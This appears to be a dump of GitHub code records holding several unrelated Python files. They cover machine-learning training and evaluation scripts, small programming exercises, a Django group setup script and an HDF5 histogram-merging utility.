{'Yelp Basic': yelp_basic, 'Yelp Categories': yelp_categories,\n 'Yelp Attributes': yelp_attributes, 'Top Yelp Review': top_yelp_review_features,\n 'Google Maps Nearby': google_maps_nearby_columns, 'All Yelp': all_yelp_columns,\n 'Census - Economic Data by Zip Code': census_columns, 'All': all_columns}\n\n x_df = df[x_column_sets['All']]\n\n y_df = df[['closed_on_google']].values.ravel()\n\n X_train, X_test, y_train, y_test = train_test_split(x_df, y_df, test_size=0.33, random_state=10)\n\n print(\"Fitting, testing, and creating/saving figs for 4 classifiers...\")\n rf_model = RandomForestClassifier(n_estimators=100)\n rf_model.fit(X_train, y_train)\n plot_roc(rf_model, X_test, y_test)\n best_values, best_features = get_best_features(rf_model, X_test.columns, 10)\n 
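# save a horizontal bar chart of the ten strongest random-forest features under ../plots\n    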
plot_best_features(best_values, best_features, \"Best Features for Random Forest\",\n 10, 100, 50)\n\n gb_model = GradientBoostingClassifier(n_estimators=100)\n gb_model.fit(X_train, y_train)\n plot_roc(gb_model, X_test, y_test)\n best_values, best_features = get_best_features(gb_model, X_test.columns, 10)\n plot_best_features(best_values, best_features, \"Best Features for Gradient Boost\",\n 10, 100, 50)\n\n dt_model = DecisionTreeClassifier()\n dt_model.fit(X_train, y_train)\n plot_roc(dt_model, X_test, y_test)\n best_values, best_features = get_best_features(dt_model, X_test.columns, 10)\n plot_best_features(best_values, best_features, \"Best Features for Decision Tree\",\n 10, 100, 50)\n\n ab_model = AdaBoostClassifier()\n ab_model.fit(X_train, y_train)\n plot_roc(ab_model, X_test, y_test)\n best_values, best_features = get_best_features(ab_model, X_test.columns, 10)\n plot_best_features(best_values, best_features, \"Best Features for Ada Boost\",\n 10, 100, 50)\n\n print(\"Plotting best features within each column group...\")\n for key, columns in x_column_sets.items():\n gb_model = GradientBoostingClassifier(n_estimators=100)\n gb_model.fit(X_train[columns], y_train)\n plot_roc(gb_model, X_test[columns], y_test, title=key + \" Columns\")\n best_values, best_features = get_best_features(gb_model, X_test[columns].columns, 10)\n plot_best_features(best_values, best_features, f\"Feature Importances for {key}\",\n 10, 100, 50)\n\n all_values, all_features = get_best_features(gb_model, all_columns, len(all_columns))\n\n feature_dict = {'Yelp Basic': x_column_sets['Yelp Basic'], 'Yelp Categories': x_column_sets['Yelp Categories'],\n 'Yelp Attributes': x_column_sets['Yelp Attributes'],\n 'Yelp Reviews': x_column_sets['Top Yelp Review'],\n 'Google Maps Nearby': x_column_sets['Google Maps Nearby'],\n 'Census - Economic Data by Zip Code': x_column_sets['Census - Economic Data by Zip Code']}\n feature_category_values = {'Yelp Basic': 0, 'Yelp Categories': 0,\n 'Yelp Attributes': 0, 'Yelp Reviews': 0,\n 'Google Maps Nearby': 0,\n 'Census - Economic Data by Zip Code': 0}\n\n feature_value_pairs = dict(list(zip(all_features, all_values)))\n\n for key, values in feature_dict.items():\n for v in values:\n feature_category_values[key] += feature_value_pairs[v]\n\n plot_best_features(list(feature_category_values.values()), list(feature_category_values.keys()),\n \"Feature Importances by Category\", 10, 100, 50)\n\n print(\"All models fit and tested successfully! 
Check the \\'plots\\' folder\\\n one level up to see the results.\")\n","repo_name":"ellcrane/will-it-close","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41307899515","text":"# Leer un numero entero de tres digitos y determinar la suma de sus digitos.\r\n\r\ntry:\r\n\r\n numero = int(input(\"Ingrese una valor numerico: \"))\r\n\r\n if numero >=100 and numero <= 999:\r\n\r\n dig1 = numero %1000 //100\r\n dig2 = numero %100 //10\r\n dig3 = numero %10\r\n suma = dig1 + dig2 + dig3\r\n\r\n print(\"La suma de sus digitos es:\", suma)\r\n\r\n\r\n\r\nexcept ValueError:\r\n print(\"+++ERROR+++\")","repo_name":"iLoGuel/Ejercicios-basicos-en-programacion-de-software","sub_path":"Python/Ejercicios condicionales Python/ejercicio15.py","file_name":"ejercicio15.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41915608281","text":"from collections import Counter, deque\n\nn = int(input())\ninput()\nfor tcase in range(n):\n lines = []\n line = input()\n while line.replace(\" \", \"\") != \"\":\n lines.append(line)\n try:\n line = input()\n except:\n break\n \n \n counters = [Counter(l.replace(\" \", \"\")) for l in lines]\n pairs = set()\n for i, x in enumerate(counters):\n for j, y in enumerate(counters):\n if i != j and x == y:\n pair = min(lines[i], lines[j]) + \" = \" + max(lines[i], lines[j])\n pairs.add(pair)\n\n for pair in sorted(pairs):\n print(pair)\n \n if tcase != n-1: print()\n\n ","repo_name":"TobiPristupin/CompetitiveProgramming","sub_path":"UVa/Anagrams454.py","file_name":"Anagrams454.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38811985708","text":"import numpy as np\nimport tensorflow as tf\n\n\ndef get_character_count():\n alphabet = get_alphabet()\n\n return len(alphabet)\n\ndef get_alphabet():\n return list(\"abcdefghijklmnopqrstuvwxyz \\n\")\n\ndef text_to_vector(text):\n alphabet = get_alphabet()\n vector = []\n\n for char in text:\n if char.lower() in alphabet:\n one_hot = [0] * get_character_count()\n index = alphabet.index(char.lower())\n one_hot[index] = 1\n vector.append(one_hot)\n\n return vector\n\n\ndef build_model():\n model = tf.keras.Sequential([\n tf.keras.layers.LSTM(128, input_dim=get_character_count(), return_sequences=True),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Bidirectional(tf.keras.layers.LSTM(64)),\n tf.keras.layers.Dense(32),\n tf.keras.layers.Dense(get_character_count(), activation=\"softmax\")\n ])\n\n model.compile(loss=tf.keras.losses.CategoricalCrossentropy(), optimizer=tf.keras.optimizers.Adam(0.01))\n\n return model\n\ndef train_model(model, x, y):\n print (\"Training...\")\n model.fit(x, y, epochs=30)\n model.save(\"save\")\n\ndef prep_dataset(file):\n text = open(file, \"r\").read()\n vec = text_to_vector(text)\n xs = []\n ys = []\n i = 0\n while i < len(vec) - 15:\n x = vec[i:i+15]\n y = vec[i+15]\n xs.append(x)\n ys.append(y)\n\n i += 1\n\n return xs, ys\n\nif __name__ == \"__main__\":\n model = build_model()\n x = []\n y = []\n\n for i in range(1, 9):\n a, b = prep_dataset(f\"data{i}.txt\")\n for i in a:\n x.append(i)\n for i in b:\n y.append(i)\n\n train_model(model, np.array(x, dtype=float), np.array(y, 
dtype=float))","repo_name":"ashwins-code/Tensorflow-Lyrics-Generator","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42307121535","text":"from impl.run import *\n\nif __name__ == '__main__':\n ob = Run()\n ob.start()\n\n\n\n\"\"\"\ndef funcion2():\n x1 = \"POO\"\n x2= \"Hola\"\n x3 = 30\n x4 = x1+x2+str(x3)+str(True)\n print(x4)\n\ndef funcion3():\n n1 = int(input(\"Numero 1:\"))\n n2 = int(input(\"Numero 2:\"))\n r = suma(n1,n2)\n print(\"Total:\"+str(r))\n\ndef funcion4():\n edad = int(input(\"Edad:\"))\n res = getAge(edad)\n print(res)\ndef funcion5():\n c= 0\n ci =0\n ac =0\n while c < 20:\n c = c+1\n if c%2!=0:\n print(c)\n ci = ci +1\n ac= ac +c\n print(\"La cantidad de impares es:\"+str(ci))\n print(\"El total acumulado es:\"+str(ac))\n\n ac = 0\n cp =0\n for i in range(1,11):\n if i % 2==0:\n cp = cp +1\n print(i)\n ac = ac +i\n\n print(\"Numero de pares es:\"+str(cp))\n print(\"Valor acumulado de pares es:\"+str(ac))\n\ndef funcion6():\n datos = (\"2F\",100,True,100.56,\"POO\")\n print(datos[2])\n datos = (True,100.56,\"POO\")\n #datos[3]=23\n for i in range(len(datos)):\n print(datos[i])\n lista = []\n lista.append(6)\n lista.append(\"2F\")\n lista.append(100)\n lista.append(False)\n lista[2]=800\n #lista.pop(1)\n del lista[1]\n print(lista)\n for i in range(len(lista)):\n print(lista[i])\n lista.clear()\n print(len(lista))\n dic = {\n \"2F\" : 200,\n 12 : \"Jorge\",\n False : (5,6,7,8),\n (5,8) : 123\n }\n dic[33]=\"POO\"\n del dic[\"2F\"]\n dic[False]=1200\n print(dic[(5,8)])\n print(dic)\n\ndef funcion7():\n nombre = input(\"Nombre:\")\n materia = input(\"Materia:\")\n n1 = float(input(\"Nota 1:\"))\n n2 = float(input(\"Nota 2:\"))\n n3 = float(input(\"Nota 3:\"))\n r = getAverange(n1,n2,n3)\n msg = getMessage(r)\n if msg!=\"Valor incorrecto!\":\n print(\"Promedio es:\"+str(round(r,2)))\n print(msg)\n else:\n print(msg)\n\ndef funcion8():\n #hhh\n tupla = (\"Registro\",\"Consulta\",\n \"Actualizar\",\"Eliminar\",\n \"Listar\",\"Salir\")\n op =getMenu(tupla)\n if op== 1:\n print(\"Python\")\n input(\" para continuar...\")\n funcion8()\n\n if op==2:\n print(\"Java\")\n input(\" para continuar...\")\n funcion8()\n if op==3:\n print(\"C++\")\n input(\" para continuar...\")\n funcion8()\n\n\n\n\ndef funcion1():\n print(\"Hola Franklin\")\n print(\"Segundo F\")\n\n#funcion8()\n\nk = inputInt(\"Ingrese su edad:\")\n\"\"\"\n","repo_name":"joseluistapia16/SegundoF1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16017057628","text":"import time\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--schema', type=str, required=True, help=\"Database schema: one of the subdirectories of RODI/data\")\nparser.add_argument('--pos_size', type=int, default=100, help=\"Number of positive samples per predicate\")\nparser.add_argument('--filterlist', type=str, default=None, help=\"Comma separated list of predicates names. 
If missing, all predicates in the queries are considered.\")\nparser.add_argument('--sampling', type=str, default=\"uniform\", help=\"Negative sampling: uniform/realistic\")\nparser.add_argument('--outdir', type=str, default=\"outdata\", help=\"Output directory\")\nargs = parser.parse_args()\nprint(\"\\nArguments:\")\nfor arg in vars(args):\n print(\" \", arg, getattr(args, arg))\nprint(\"\\n\")\n \nimport mappingProblem\nimport supervision\n\ndef generate(schema, true_mapping, pos_size, outdir, filterlist=None, sampling=\"uniform\"):\n print(\"SCHEMA: \", schema)\n ontology = \"RODI/data/{}/ontology.ttl\".format(schema)\n query_dir = \"RODI/data/{}/queries\".format(schema)\n datapath = \"{}/{}/{}\".format(outdir, schema, schema)\n problem = mappingProblem.MappingProblem(schema, ontology, true_mapping)\n problem.add_query_dir(query_dir)\n \n t0 = time.time()\n problem.generate_data(samplesize=pos_size, path=datapath, filterlist=filterlist, sampling=sampling)\n # problem.generate_data_neg_uniform(samplesize=pos_size, path=datapath, filterlist=filterlist)\n t1 = time.time()\n print(\"Data generation for schema {} took {:.3f} sec\".format(schema, t1 - t0))\n\n\nschema2supervision = {\n \"cmt_renamed\": supervision.cmt_renamed_mapping,\n \"cmt_structured\": supervision.cmt_structured_mapping,\n \"cmt_structured_ci\": supervision.cmt_structured_ci_mapping,\n \"cmt_naive\": supervision.cmt_naive_mapping,\n \"cmt_naive_ci\": supervision.cmt_naive_ci_mapping,\n \"cmt_denormalized\": supervision.cmt_denormalized_mapping,\n \"cmt_mixed\": supervision.cmt_mixed_mapping,\n}\n\nif args.schema in schema2supervision:\n true_mapping = schema2supervision[args.schema]\nelse:\n true_mapping = None\n\nif args.filterlist is not None:\n args.filterlist = args.filterlist.split(',')\n \ngenerate(args.schema, true_mapping, args.pos_size, args.outdir, args.filterlist, args.sampling)\n","repo_name":"zsoltzombori/mapping","sub_path":"extract/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44288298575","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nP = 10 # nombre d'itérations\nx1, x2, x3, y1, y2, y3 = 1, -1, 0, -1, -1, 1\nx0 = int(input('estimation initiale x0: '))\ny0 = int(input('estimation initiale y0: '))\nX = 0.5 #T\nY = 0.5 #L vrai position de la source\nxk = x0 #T\nyk = y0 #L position estimée de la source à la k-ième itération\nn = 3 # nombre de microphones\nx = [x1, x2, x3] #T\ny = [y1, y2, y3] #L positions respectives des microphones 1, 2 et 3\nm = [1, 1, 1] # ['input(TOA) (range estimation)' for _ in range(n)] # len(m) = 3 (= len(n))\nd, Q, D, e, Xapprox, Yapprox = [[] for _ in range(6)]\nA = []\n\n# TOA method 2D\n# x=xk+d 2 formules pour trouver d: \n# 1) Ad=D+e\n# 2) d=(A^{T}Q^{-1}A)^{-1}A^{T}Q^{-1}D\nfor _ in range(P):\n for i in range(n):\n r = np.sqrt((xk-x[i])**2 + (yk-y[i])**2) # len(r) = 1 ; r = fv \n A.append([[(xk - x[I])/r, (yk - y[I])/r] for I in range(n)])\n D.append(m[i] - r)\n e.append(1) # vecteur colonne de l'erreur à chaque itération voir Q\n print(len(np.size(A)))\n Ainv = np.linalg.inv(np.array(A))\n d.append(Ainv.dot(D+e)) # c'est ce qu'on cherche ; len(d) = i\n\n Q = 1 # ??? covariance matrix, range estimation error ??? 
voir avec e\n\n xk += d[0]\n yk += d[1]\n Xapprox.append(xk)\n Yapprox.append(yk)\n # fin de la première itération mettre le tout dans une boucle \n\nplt.figure()\nplt.plot(x0, y0, 'O')\nplt.plot(Xapprox, Yapprox, 'o')\nplt.plot(x, y, 's')\nplt.plot(X, Y, '*')\nplt.show()\n","repo_name":"marecmat/acoustic-source-localisation","sub_path":"taylor.py","file_name":"taylor.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11027766568","text":"# Numero palíndromo: \n\n# 123321\n# 1758571\n\n# numero: 121\n# sim\n\n# numero: 123\n# nao\n\n# numero: 3\n# sim\n\ndef palindromo(x):\n tam = None\n if (len(x) % 2 == 0):\n tam = int(len(x) / 2)\n else:\n tam = int((len(x) - 1) / 2)\n for pos in range(tam - 1):\n if(x[pos] != x[len(x) - 1 - pos]):\n return False\n return True\n\nx=input(\"qlq coisa:\")\nprint(palindromo(x))","repo_name":"AndrewHanasiro/Algoritmos","sub_path":"Python/palindromo.py","file_name":"palindromo.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73722658727","text":"from __future__ import unicode_literals\nfrom builtins import str\n\n# from lino.utils.instantiator import Instantiator\nfrom lino.api import rt, dd, _\n\n\nCompany = rt.models.contacts.Company\nPlan = rt.models.healthcare.Plan\n\ndef objects():\n # source: https://www.riziv.fgov.be/fr/professionnels/autres/mutualites/Pages/contactez-mutualites.aspx\n bxl = rt.models.countries.Place.objects.get(**dd.babel_values('name', de=\"Brüssel\", en=\"Brussels\"))\n kw = dict(country_id=\"BE\", city=bxl)\n\n def provider(ref, name, **kwargs):\n prov = Company(name=name, **kwargs)\n yield prov\n yield Plan(provider=prov, ref=ref)\n\n yield provider(_(\"Christian HIS\"), \"Alliance nationale des mutualités chrétiennes\", street=\"Haachtsesteenweg 579\", street_box=\"postbus 40\", zip_code=\"1031\")\n yield provider(_(\"Neutral HIS\"), \"Union nationale des mutualités neutres\", street=\"Chaussée de Charleroi\", street_no=\"145\", zip_code=\"1060\")\n yield provider(_(\"Socialist HIS\"), \"Union nationale des mutualités socialistes\", street=\"Rue Saint-Jean\", street_no=\"32-38\", zip_code=\"1000\")\n yield provider(_(\"Liberal HIS\"), \"Union nationale des Mutualités Libérales\", street=\"Rue de Livourne\", street_no=\"25\", zip_code=\"1050\")\n yield provider(_(\"Libre HIS\"), \"Union nationale des mutualités libres\", street=\"Lenniksebaan\", street_no=\"788A\", zip_code=\"1070\")\n\n","repo_name":"lino-framework/xl","sub_path":"lino_xl/lib/healthcare/fixtures/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22540189263","text":"import numpy as np\n\ndef loadData(fileName, arrSize=3, spliter=' '):\n fin = open(fileName, \"r\")\n lines = fin.readlines()\n cnt = len(lines)\n data = np.zeros([cnt,arrSize])\n for i in range(cnt):\n data[i] = lines[i].split(spliter)[-3:]\n # print(data[i])\n fin.close()\n return data\n\ndef outputData(fileName, data):\n fout = open(fileName, \"w\")\n for i in range(data.shape[0]):\n fout.write(str(data[i][0]) + ' ' + str(data[i][1]) + ' ' + str(data[i][2]) + '\\n')\n fout.close()\n return\n\ndef outPutFace(fileName, data) :\n fout = open(fileName, \"w+\")\n data = data.reshape(-1,3)\n for i in range(data.shape[0]):\n fout.write(str(data[i][0]) + ' ' + 
str(data[i][1]) + ' ' + str(data[i][2]) + '\\n')\n fout.close()\n return","repo_name":"MessyShen/3DFace2.1","sub_path":"DicLearning/dataio.py","file_name":"dataio.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18468242010","text":"'''\nCode credited to https://github.com/eriklindernoren/PyTorch-YOLOv3/blob/master/utils/utils.py\nMinor updates made to work with this code base\n'''\n\nimport numpy as np\nimport torchvision\nfrom matplotlib import pyplot as plt\n\ndef get_batch_statistics(outputs, targets, iou_threshold=0.5):\n \"\"\" Compute true positives, predicted scores and predicted labels per sample \"\"\"\n batch_metrics = []\n\n for output, target in zip(outputs, targets):\n\n if output is None:\n continue\n\n pred_boxes = output['boxes']\n pred_scores = output['scores']\n pred_labels = output['labels']\n\n true_positives = np.zeros(pred_boxes.shape[0])\n\n num_target_boxes = len(target['labels'])\n\n if num_target_boxes > 0:\n detected_boxes = []\n target_boxes = target['boxes']\n\n for pred_i, (pred_box, pred_label) in enumerate(zip(pred_boxes, pred_labels)):\n\n # If targets are found break\n if len(detected_boxes) == num_target_boxes:\n break\n\n # Ignore if label is not one of the target labels\n if pred_label not in target['labels']:\n continue\n\n ious = torchvision.ops.box_iou(target_boxes, pred_box.unsqueeze(0)).cpu().numpy()\n box_index = np.argmax(ious)\n iou = np.max(ious)\n if iou >= iou_threshold and box_index not in detected_boxes:\n true_positives[pred_i] = 1\n detected_boxes += [box_index]\n batch_metrics.append([true_positives, pred_scores.cpu().numpy(), pred_labels.cpu().numpy(), target['labels'].cpu().numpy()])\n return batch_metrics\n\n\ndef ap_per_class(tp, conf, pred_cls, target_cls):\n \"\"\" Compute the average precision, given the recall and precision curves.\n Source: https://github.com/rafaelpadilla/Object-Detection-Metrics.\n # Arguments\n tp: True positives (list).\n conf: Objectness value from 0-1 (list).\n pred_cls: Predicted object classes (list).\n target_cls: True object classes (list).\n # Returns\n The average precision as computed in py-faster-rcnn.\n \"\"\"\n\n # Sort by objectness\n i = np.argsort(-conf)\n tp, conf, pred_cls = tp[i], conf[i], pred_cls[i]\n\n # Find unique classes\n unique_classes = np.unique(target_cls)\n\n # Create Precision-Recall curve and compute AP for each class\n ap, p, r = [], [], []\n for c in unique_classes:\n i = pred_cls == c\n n_gt = (target_cls == c).sum() # Number of ground truth objects\n n_p = i.sum() # Number of predicted objects\n\n if n_p == 0 and n_gt == 0:\n continue\n elif n_p == 0 or n_gt == 0:\n ap.append(0)\n r.append(0)\n p.append(0)\n else:\n # Accumulate FPs and TPs\n fpc = (1 - tp[i]).cumsum()\n tpc = (tp[i]).cumsum()\n\n # Recall\n recall_curve = tpc / (n_gt + 1e-16)\n r.append(recall_curve[-1])\n\n # Precision\n precision_curve = tpc / (tpc + fpc)\n p.append(precision_curve[-1])\n\n # AP from recall-precision curve\n ap.append(compute_ap(recall_curve, precision_curve))\n\n # Compute F1 score (harmonic mean of precision and recall)\n p, r, ap = np.array(p), np.array(r), np.array(ap)\n f1 = 2 * p * r / (p + r + 1e-16)\n\n return p, r, ap, f1, unique_classes.astype(\"int32\")\n\n\ndef compute_ap(recall, precision):\n \"\"\" Compute the average precision, given the recall and precision curves.\n Code originally from https://github.com/rbgirshick/py-faster-rcnn.\n # Arguments\n recall: The 
recall curve (list).\n precision: The precision curve (list).\n # Returns\n The average precision as computed in py-faster-rcnn.\n \"\"\"\n # correct AP calculation\n # first append sentinel values at the end\n mrec = np.concatenate(([0.0], recall, [1.0]))\n mpre = np.concatenate(([0.0], precision, [0.0]))\n\n # compute the precision envelope\n for i in range(mpre.size - 1, 0, -1):\n mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])\n\n # to calculate area under PR curve, look for points\n # where X axis (recall) changes value\n i = np.where(mrec[1:] != mrec[:-1])[0]\n\n # and sum (\\Delta recall) * prec\n ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])\n return ap\n\n\ndef show_hp_comparison():\n hyperband = .5272\n old_hps = .3806\n\n names = ['\"Recommended\" Hyperparameters', 'With Adaptive Search']\n values = [old_hps, hyperband]\n\n plt.bar(names, values, width=0.6)\n plt.xticks(fontsize=18)\n plt.yticks(fontsize=18)\n plt.ylabel('Mean Average Preciscion', fontsize=18)\n plt.show()\n\n\ndef show_dog_comparison():\n v1 = .481\n v2 = .664\n\n names = ['Dataset V0', 'Dataset V1']\n values = [v1, v2]\n\n plt.bar(names, values, width=0.6)\n plt.xticks(fontsize=18)\n plt.yticks(fontsize=18)\n plt.ylabel('Mean Average Preciscion (dog)', fontsize=18)\n plt.show()\n","repo_name":"determined-ai/works-with-determined","sub_path":"spark_ecosystem/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"2609172268","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport django\n\nfrom django.db.utils import IntegrityError\n\nsys.path.append('.')\nos.environ['DJANGO_SETTINGS_MODULE'] = 'alfmonitor.settings'\ndjango.setup()\n\nfrom django.contrib.auth.models import Group, User\n\n\nuser_groups = (\n 'console_admins',\n 'console_users',\n)\n\n\nif __name__ == '__main__':\n admin_user = User.objects.get(username='admin')\n\n for group_name in user_groups:\n group = Group()\n group.name = group_name\n try:\n group.save()\n except IntegrityError:\n print('Group: {} alfready exists.'.format(group_name))\n\n admin_user.groups.add(Group.objects.get(name='console_admins'))\n","repo_name":"hseritt/alfmonitor","sub_path":"scripts/add_groups.py","file_name":"add_groups.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21028067639","text":"from argparse import ArgumentParser\nfrom time import time_ns\n\ndef get_floor(filepath: str) -> str:\n with open(filepath, \"r\") as filename:\n instructions = filename.readline()\n return instructions.count(\"^\") - instructions.count(\"v\")\n\ndef main(filepath: str) -> None:\n start_time = time_ns()\n answer = get_floor(filepath)\n end_time = time_ns()\n total_time = end_time - start_time\n print(f\"Go to floor {answer}.\")\n print(f\"This took {total_time} nanoseconds.\")\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"-f\", required = True)\n args = parser.parse_args()\n main(filepath = args.f)","repo_name":"cyberphor/python-programs","sub_path":"ai2c-challenges/challenge09.py","file_name":"challenge09.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19702204191","text":"from scharm.hists import HistNd\nimport h5py\nimport numpy as np\nfrom h5py import Dataset, Group\nfrom os.path import 
isfile, isdir, join, splitext, basename\nfrom itertools import chain\nimport os\nimport sys\nimport warnings\n\ndef hadd(config):\n    \"\"\"\n    Scales to 1 fb^-1 if scaling is requested.\n    \"\"\"\n    if config.recursive:\n        _recursive_hadd(config)\n        return\n    good_files = _get_good_files(config.input_hists)\n    if config.dash_hadd:\n        if config.norm:\n            raise ValueError('normalization not allowed for dash-hadd')\n        _dash_hadd(good_files, config.output, fast=config.fast,\n                   aggressive=config.aggressive)\n    else:\n        weights_dict = {}\n        if config.norm:\n            raise ValueError(\"normalization not currently supported...\")\n        _hadd(good_files, config.output, weights_dict, fast=config.fast)\n\ndef _get_good_files(input_hists):\n    good_files = []\n    for hist_file in input_hists:\n        if not hist_file.endswith('.h5'):\n            raise OSError(\"unrecognized extension: {}\".format(\n                splitext(hist_file)[-1]))\n        with h5py.File(hist_file, 'r') as h5:\n            if len(h5.keys()):\n                good_files.append(hist_file)\n    if len(good_files) != len(input_hists):\n        sys.stderr.write(\n            'ACHTUNG: only {} of {} files have any hists\\n'.format(\n                len(good_files), len(input_hists)))\n    return good_files\n\ndef _recursive_hadd(config):\n    if not all(isdir(x) for x in config.input_hists):\n        raise OSError(\"recursive hadd requires input_hists to be dir\")\n    all_walk = chain(*(os.walk(x) for x in config.input_hists))\n    for dirpath, dirnames, file_names in all_walk:\n        if not file_names:\n            continue\n        out_path = join(config.output, *dirpath.split(os.path.sep)[1:])\n        file_paths = [join(dirpath, x) for x in file_names]\n        good_files = _get_good_files(file_paths)\n        if isdir(out_path):\n            raise OSError(\n                \"output directory {} already exists, \"\n                \" refusing overwrite\".format(out_path))\n        os.makedirs(out_path)\n        _dash_hadd(good_files, out_path, fast=config.fast,\n                   aggressive=config.aggressive)\n\ndef _dash_hadd(good_files, output, fast=False, aggressive=False):\n    def key_from_name(fname):\n        return splitext(basename(fname))[0].split('-')[0]\n    if not isdir(output):\n        os.mkdir(output)\n    base_keys = {key_from_name(f) for f in good_files}\n    for key in base_keys:\n        out_path = join(output, '{}.h5'.format(key))\n        print('making {}'.format(out_path))\n        file_group = [f for f in good_files if key in f]\n        missing = _get_missing_subfiles(file_group)\n        if missing:\n            subfiles_str = ', '.join(str(x) for x in sorted(missing))\n\n            prob = \"file {} can't be created, missing subfiles: {}\".format(\n                out_path, subfiles_str)\n            if aggressive:\n                warnings.warn(prob, stacklevel=2)\n            else:\n                raise IOError(prob)\n        _hadd(file_group, out_path, fast=fast)\n\n\ndef _get_missing_subfiles(file_group):\n    \"\"\"\n    checks the 'XofY' string on the end of histogram files.\n    \"\"\"\n    if not 'of' in file_group[0].split('-')[-1]:\n        return []\n    else:\n        extensions = [f.split('-')[-1] for f in file_group]\n        numbers = set()\n        total_set = set()\n        for ext in extensions:\n            num, tot = splitext(ext)[0].split('of')\n            numbers.add(int(num))\n            total_set.add(int(tot))\n        total = int(next(iter(total_set)))\n        if not len(total_set) == 1:\n            gname = file_group[0].split('-')[0]\n            raise IOError('two totals ({}) found for {}'.format(\n                ', '.join(str(x) for x in total_set), gname))\n        if not len(numbers) == total:\n            return set(range(1, total + 1)) - numbers\n    return []\n\ndef _hadd(good_files, output, weights_dict={}, fast=False):\n    with h5py.File(good_files[0],'r') as base_h5:\n        weight = weights_dict.get(good_files[0],1.0)\n        hadder = HistAdder(base_h5, weight=weight, wt2_ext='Wt2')\n        counter = EventCounter(base_h5)\n    for add_file in good_files[1:]:\n        
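# merge each remaining subfile into the running totals; the fast path\n        # skips per-node validation and array copies (see _fast_merge below)\n        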
if not isfile(add_file):\n raise IOError(\"{} doesn't exist\".format(add_file))\n if fast:\n weight = weights_dict.get(add_file, None)\n with h5py.File(add_file,'r') as add_h5:\n hadder.fast_add(add_h5, weight=weight)\n counter.add_file(add_h5)\n else:\n weight = weights_dict.get(add_file, 1.0)\n with h5py.File(add_file,'r') as add_h5:\n hadder.add(add_h5, weight=weight)\n counter.add_file(add_h5)\n if output:\n with h5py.File(output,'w') as out_file:\n hadder.write_to(out_file)\n counter.write_to(out_file)\n else:\n hadder.dump()\n\n# __________________________________________________________________________\n# counter class\nclass EventCounter:\n \"\"\"keep track of various event counts\"\"\"\n _count_keys = ['total_events', 'total_collection_tree']\n def __init__(self, base_h5):\n self._counts = {}\n for key in self._count_keys:\n self._counts[key] = base_h5.attrs.get(key, 0)\n for key, count in base_h5.attrs.items():\n if key not in self._count_keys:\n self._counts[key] = count\n def add_file(self, add_h5):\n for key in self._counts:\n self._counts[key] += add_h5.attrs.get(key, 0)\n def write_to(self, out_file):\n for key, count in self._counts.items():\n out_file.attrs[key] = count\n\n# ___________________________________________________________________________\n# HistAdder class\n\nclass HistAdder(object):\n \"\"\"\n Generic histogram adder. Traverses the first given file to map out\n histograms, then finds the corresponding hists for each call to add\n and adds them.\n \"\"\"\n def __init__(self, base_group, weight=1.0, wt2_ext=None):\n self.wt2_ext = wt2_ext\n self.hists = self._search(base_group, weight)\n\n def _search(self, group, weight):\n subhists = {}\n for key, subgroup in group.items():\n if isinstance(subgroup, Group):\n subhists[key] = self._search(subgroup, weight)\n elif isinstance(subgroup, Dataset):\n # proper treating of weighted hists\n # FIXME: this should be a hist attribute\n if self.wt2_ext and key.endswith(self.wt2_ext):\n subhists[key] = HistNd(subgroup) * weight**2\n else:\n subhists[key] = HistNd(subgroup)*weight\n else:\n raise HistAddError('not sure what to do with {} {}'.format(\n type(subgroup), key))\n return subhists\n def _merge(self, hist_dict, new_hists, weight):\n merged = {}\n for key, subgroup in hist_dict.items():\n if not key in new_hists:\n raise HistAddError(\n \"node {} not found in new hists\".format(key))\n if isinstance(subgroup, dict):\n merged[key] = self._merge(subgroup, new_hists[key], weight)\n elif isinstance(subgroup, HistNd):\n if not isinstance(new_hists[key], Dataset):\n raise HistAddError(\n \"tried to merge non-dataset {}\".format(key))\n # proper treating of weighted hists\n if self.wt2_ext and key.endswith(self.wt2_ext):\n new_hist = HistNd(new_hists[key]) * weight**2\n else:\n new_hist = HistNd(new_hists[key])*weight\n merged[key] = subgroup + new_hist\n else:\n raise HistAddError('not sure what to do with {}, {}'.format(\n type(subgroup), 